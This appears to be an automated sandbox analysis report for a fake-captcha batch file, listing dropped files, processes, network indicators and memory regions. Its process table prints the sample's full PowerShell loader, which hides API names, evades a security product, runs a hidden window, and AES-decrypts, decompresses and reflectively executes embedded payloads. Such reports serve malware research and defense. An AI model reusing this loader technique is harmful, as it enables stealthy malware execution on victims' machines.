Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Captcha_V4ID882994ft.bat
|
DOS batch file, ASCII text, with very long lines (65190), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0xbd411654, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02m5ip05.ht3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40ertn1r.cpf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ntb4tm.ugs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfttuavn.ydv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2239), with CRLF line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH',
''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd',
''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz',
''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv',
''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ',
''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if
($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function
LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object
System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU
(rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi,
6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null);
"
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ax-0001.ax-msedge.net
|
150.171.27.10
|
||
|
tse1.mm.bing.net
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.91.69.119
|
unknown
|
Spain
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4B90000
|
trusted library allocation
|
page read and write
|
||
|
1DAEEF5E000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9B02000
|
heap
|
page read and write
|
||
|
50AE000
|
stack
|
page read and write
|
||
|
1DAEEF30000
|
trusted library allocation
|
page read and write
|
||
|
1DAEEF30000
|
trusted library allocation
|
page read and write
|
||
|
77FE000
|
stack
|
page read and write
|
||
|
1DAEF0F9000
|
heap
|
page read and write
|
||
|
1DAE9B02000
|
heap
|
page read and write
|
||
|
326A000
|
heap
|
page read and write
|
||
|
1DAE9AB0000
|
heap
|
page read and write
|
||
|
32ED000
|
heap
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
5370000
|
heap
|
page execute and read and write
|
||
|
4B70000
|
trusted library allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
50B0000
|
heap
|
page readonly
|
||
|
7ACE000
|
stack
|
page read and write
|
||
|
511C000
|
stack
|
page read and write
|
||
|
21B5DF7000
|
stack
|
page read and write
|
||
|
6381000
|
trusted library allocation
|
page read and write
|
||
|
1DAEAA30000
|
trusted library allocation
|
page read and write
|
||
|
5406000
|
trusted library allocation
|
page read and write
|
||
|
548C000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF02B000
|
heap
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
5590000
|
trusted library allocation
|
page read and write
|
||
|
573F000
|
trusted library allocation
|
page read and write
|
||
|
21B68FE000
|
unkown
|
page readonly
|
||
|
317E000
|
unkown
|
page read and write
|
||
|
1DAEF2A0000
|
remote allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
1DAE9A1F000
|
heap
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
3276000
|
heap
|
page read and write
|
||
|
319A000
|
heap
|
page read and write
|
||
|
2DAB000
|
stack
|
page read and write
|
||
|
5391000
|
trusted library allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
1DAE9A6E000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
1DAEEF01000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9AAC000
|
heap
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
7969000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
1DAE9940000
|
heap
|
page read and write
|
||
|
1DAEF570000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9A90000
|
heap
|
page read and write
|
||
|
5452000
|
trusted library allocation
|
page read and write
|
||
|
31DE000
|
unkown
|
page read and write
|
||
|
5381000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
74CF000
|
stack
|
page read and write
|
||
|
1DAE9A74000
|
heap
|
page read and write
|
||
|
1DAEF0E6000
|
heap
|
page read and write
|
||
|
538C000
|
trusted library allocation
|
page read and write
|
||
|
78E6000
|
heap
|
page read and write
|
||
|
1DAEF093000
|
heap
|
page read and write
|
||
|
1DAE9A13000
|
heap
|
page read and write
|
||
|
1DAEA215000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
1DAEA191000
|
trusted library allocation
|
page read and write
|
||
|
325D000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
539D000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9A78000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
1DAEF570000
|
trusted library allocation
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
1DAEA31A000
|
heap
|
page read and write
|
||
|
1DAE9950000
|
heap
|
page read and write
|
||
|
1DAEA1D0000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DAEEF40000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF0FE000
|
heap
|
page read and write
|
||
|
75CA000
|
stack
|
page read and write
|
||
|
32EA000
|
heap
|
page read and write
|
||
|
3278000
|
heap
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF0C8000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9980000
|
trusted library allocation
|
page read and write
|
||
|
52FE000
|
stack
|
page read and write
|
||
|
1DAEF062000
|
heap
|
page read and write
|
||
|
1DAE9AA5000
|
heap
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
7914000
|
heap
|
page read and write
|
||
|
1DAEA202000
|
heap
|
page read and write
|
||
|
1DAEA31B000
|
heap
|
page read and write
|
||
|
3283000
|
heap
|
page read and write
|
||
|
1DAE9A41000
|
heap
|
page read and write
|
||
|
527E000
|
stack
|
page read and write
|
||
|
1DAEF230000
|
trusted library allocation
|
page read and write
|
||
|
4B84000
|
trusted library allocation
|
page read and write
|
||
|
21B64FE000
|
unkown
|
page readonly
|
||
|
523E000
|
stack
|
page read and write
|
||
|
78E0000
|
heap
|
page read and write
|
||
|
1DAEEF00000
|
trusted library allocation
|
page read and write
|
||
|
78BE000
|
stack
|
page read and write
|
||
|
1DAEF050000
|
heap
|
page read and write
|
||
|
21B5A7B000
|
stack
|
page read and write
|
||
|
1DAE9AFC000
|
heap
|
page read and write
|
||
|
4B99000
|
trusted library allocation
|
page read and write
|
||
|
567A000
|
trusted library allocation
|
page read and write
|
||
|
7B0D000
|
stack
|
page read and write
|
||
|
1DAE9A5B000
|
heap
|
page read and write
|
||
|
5466000
|
trusted library allocation
|
page read and write
|
||
|
5463000
|
trusted library allocation
|
page read and write
|
||
|
7650000
|
heap
|
page read and write
|
||
|
1DAEEEF0000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF102000
|
heap
|
page read and write
|
||
|
1DAEF000000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF050000
|
trusted library allocation
|
page read and write
|
||
|
1DAEEF44000
|
trusted library allocation
|
page read and write
|
||
|
1DAEEEE0000
|
trusted library allocation
|
page read and write
|
||
|
5170000
|
trusted library allocation
|
page read and write
|
||
|
560C000
|
trusted library allocation
|
page read and write
|
||
|
545D000
|
trusted library allocation
|
page read and write
|
||
|
787E000
|
stack
|
page read and write
|
||
|
21B5FFE000
|
stack
|
page read and write
|
||
|
1DAEF060000
|
trusted library allocation
|
page read and write
|
||
|
63A9000
|
trusted library allocation
|
page read and write
|
||
|
5457000
|
trusted library allocation
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
53C8000
|
trusted library allocation
|
page read and write
|
||
|
5007000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DAEF0D9000
|
heap
|
page read and write
|
||
|
1DAEEFF0000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9B17000
|
heap
|
page read and write
|
||
|
793A000
|
heap
|
page read and write
|
||
|
1DAEF2A0000
|
remote allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
1DAEA304000
|
heap
|
page read and write
|
||
|
1DAEA313000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
53F2000
|
trusted library allocation
|
page read and write
|
||
|
21B807E000
|
stack
|
page read and write
|
||
|
3259000
|
heap
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
21B80FE000
|
unkown
|
page readonly
|
||
|
7983000
|
heap
|
page read and write
|
||
|
3254000
|
heap
|
page read and write
|
||
|
5002000
|
trusted library allocation
|
page read and write
|
||
|
4B83000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DAEA1E0000
|
trusted library allocation
|
page read and write
|
||
|
7961000
|
heap
|
page read and write
|
||
|
758D000
|
stack
|
page read and write
|
||
|
1DAE9AB0000
|
heap
|
page read and write
|
||
|
1DAEF070000
|
heap
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
51F0000
|
heap
|
page execute and read and write
|
||
|
7965000
|
heap
|
page read and write
|
||
|
1DAEF10F000
|
heap
|
page read and write
|
||
|
1DAEEFE0000
|
trusted library allocation
|
page read and write
|
||
|
7A00000
|
heap
|
page execute and read and write
|
||
|
2DE8000
|
stack
|
page read and write
|
||
|
1DAE9920000
|
heap
|
page read and write
|
||
|
4BD7000
|
heap
|
page read and write
|
||
|
1DAE9A89000
|
heap
|
page read and write
|
||
|
21B7AFE000
|
unkown
|
page readonly
|
||
|
796F000
|
heap
|
page read and write
|
||
|
4B8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
754A000
|
stack
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF00E000
|
heap
|
page read and write
|
||
|
1DAEEF20000
|
trusted library allocation
|
page read and write
|
||
|
353B000
|
heap
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
1DAEF250000
|
trusted library allocation
|
page read and write
|
||
|
21B60FE000
|
unkown
|
page readonly
|
||
|
21B63F9000
|
stack
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9AB9000
|
heap
|
page read and write
|
||
|
795E000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
5005000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DAEA840000
|
trusted library allocation
|
page read and write
|
||
|
544F000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9A9B000
|
heap
|
page read and write
|
||
|
1DAEEFF0000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF4E0000
|
trusted library allocation
|
page read and write
|
||
|
3235000
|
heap
|
page read and write
|
||
|
740D000
|
stack
|
page read and write
|
||
|
2DED000
|
stack
|
page read and write
|
||
|
1DAEF200000
|
trusted library allocation
|
page read and write
|
||
|
783E000
|
stack
|
page read and write
|
||
|
744B000
|
stack
|
page read and write
|
||
|
1DAEEFD0000
|
trusted library allocation
|
page read and write
|
||
|
55B2000
|
trusted library allocation
|
page read and write
|
||
|
1DAF0000000
|
heap
|
page read and write
|
||
|
1DAEF055000
|
heap
|
page read and write
|
||
|
1DAEEFF0000
|
trusted library allocation
|
page read and write
|
||
|
21B5EFE000
|
unkown
|
page readonly
|
||
|
1DAEF0F3000
|
heap
|
page read and write
|
||
|
578A000
|
trusted library allocation
|
page read and write
|
||
|
5190000
|
heap
|
page read and write
|
||
|
7A8E000
|
stack
|
page read and write
|
||
|
792A000
|
heap
|
page read and write
|
||
|
21B5CFE000
|
unkown
|
page readonly
|
||
|
7660000
|
heap
|
page read and write
|
||
|
1DAEAEB0000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DAEF2A0000
|
remote allocation
|
page read and write
|
||
|
21B79FC000
|
stack
|
page read and write
|
||
|
1DAEEFD0000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9AAC000
|
heap
|
page read and write
|
||
|
1DAEF043000
|
heap
|
page read and write
|
||
|
1DAEF0C2000
|
heap
|
page read and write
|
||
|
1DAEEF02000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF0F6000
|
heap
|
page read and write
|
||
|
1DAEF01E000
|
heap
|
page read and write
|
||
|
63E9000
|
trusted library allocation
|
page read and write
|
||
|
1DAEF0C4000
|
heap
|
page read and write
|
||
|
5160000
|
trusted library allocation
|
page execute and read and write
|
||
|
5020000
|
trusted library allocation
|
page read and write
|
||
|
1DAEA200000
|
heap
|
page read and write
|
||
|
798B000
|
heap
|
page read and write
|
||
|
1DAEEF00000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9A00000
|
heap
|
page read and write
|
||
|
1DAE9A27000
|
heap
|
page read and write
|
||
|
32F2000
|
heap
|
page read and write
|
||
|
7977000
|
heap
|
page read and write
|
||
|
7BD0000
|
heap
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
52BE000
|
stack
|
page read and write
|
||
|
1DAE9B06000
|
heap
|
page read and write
|
||
|
1DAEA302000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page read and write
|
||
|
51F5000
|
heap
|
page execute and read and write
|
||
|
1DAEA300000
|
heap
|
page read and write
|
||
|
545A000
|
trusted library allocation
|
page read and write
|
||
|
1DAE9B13000
|
heap
|
page read and write
|
||
|
53B9000
|
trusted library allocation
|
page read and write
|
||
|
21B67FB000
|
stack
|
page read and write
|
||
|
1DAEF113000
|
heap
|
page read and write
|
||
|
1DAEF10C000
|
heap
|
page read and write
|
||
|
1DAE9AFC000
|
heap
|
page read and write
|
||
|
1DAEF240000
|
trusted library allocation
|
page read and write
|
||
|
21B5BFE000
|
stack
|
page read and write
|
||
|
1DAEEF40000
|
trusted library allocation
|
page read and write
|
||
|
1DAEA500000
|
trusted library allocation
|
page read and write
|
||
|
748E000
|
stack
|
page read and write
|
There are 244 hidden memdumps, click here to show them.